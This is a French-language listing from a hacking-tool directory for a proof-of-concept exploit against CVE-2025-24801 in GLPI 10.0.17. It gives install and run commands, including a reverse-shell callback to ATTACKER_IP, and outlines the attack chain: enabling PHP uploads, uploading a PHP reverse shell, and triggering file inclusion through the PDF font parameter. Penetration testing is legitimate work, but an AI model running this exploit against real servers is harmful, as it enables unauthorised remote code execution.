Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-24801 — Exploit de preuve de concept pour CVE-2025-24801, une vulnérabilité LFI-à-RCE dans GLPI 10.0.17. Automatise la connexion, active les téléchargements PHP et télécharge un shell inversé pour les tests de sécurité autorisés. | Kitploit
Outils/GitHubGitHub/fatkz/cve-2025-24801
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed TeamingDéveloppement de Charges Utiles
GitHubfatkz/cve-2025-24801

CVE-2025-24801

Exploit de preuve de concept pour CVE-2025-24801, une vulnérabilité LFI-à-RCE dans GLPI 10.0.17. Automatise la connexion, active les téléchargements PHP et télécharge un shell inversé pour les tests de sécurité autorisés.

Voir le dépôt
3111il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-24801 PoC pour RCE sur GLPI

Ce dépôt contient un script de preuve de concept (poc.py) qui exploite CVE-2025-24801, une vulnérabilité LFI vers RCE dans GLPI 10.0.17. Il automatise :

  • La connexion à GLPI
  • L'activation des téléversements .php en mettant à jour les paramètres de type de document
  • Le téléversement d'un shell reverse PHP via le point de terminaison AJAX de téléversement de fichier

🛠️ Installation

root@kitploit:~
git clone https://github.com/fatkz/CVE-2025-24801.git
cd CVE-2025-24801
pip install -r requirements.txt

🚀 Utilisation

root@kitploit:~
python3 poc.py \
  --url https://target.example.com/glpi \
  --user TECHNICIAN_USER \
  --password "PASSWORD" \
  --lhost ATTACKER_IP \
  --lport 4444
  • --url : URL de base de l'instance GLPI (ex. )
https://example.com/glpi
  • --user / --password : Identifiants valides d'un technicien GLPI
  • --lhost / --lport : Adresse IP et port de l'attaquant pour l'écoute du shell reverse
  • Le script utilise automatiquement --doc-id 1 par défaut pour mettre à jour le premier type de document.

    Après exécution, le script va :

    1. Se connecter et établir une session
    2. Activer les téléversements .php en mettant à jour le type de document ID 1
    3. Téléverser exploit.php contenant une charge utile de shell reverse PHP

    Vous devrez ensuite déclencher manuellement la LFI en spécifiant le nom du fichier téléversé dans l'inclusion de police PDF (par exemple via la fonction d'export de rapport) pour obtenir une RCE.

    📑 Comment ça fonctionne

    1. Connexion : Extrait le jeton CSRF de /front/login.php et soumet les identifiants pour s'authentifier.
    2. Activation des téléversements PHP : Récupère /front/documenttype.form.php?id=1, parse le jeton CSRF, et ajoute php aux extensions autorisées.
    3. Téléversement du shell : Récupère /front/ticket.form.php pour un jeton CSRF, puis utilise /ajax/fileupload.php (avec X-Requested-With: XMLHttpRequest) pour téléverser un shell reverse PHP.
    4. Déclenchement de la RCE : Invoquer manuellement la LFI via la police PDF en spécifiant le nom du fichier shell téléversé dans le paramètre pdffont lors de l'export de rapport.

    ⚠️ Avertissement

    Cet outil est destiné uniquement à des tests de sécurité autorisés et à des fins éducatives. Ne l'utilisez pas contre des systèmes sans autorisation explicite.


    Créé à des fins éducatives et de test d'intrusion autorisé.

    Télécharger l’outil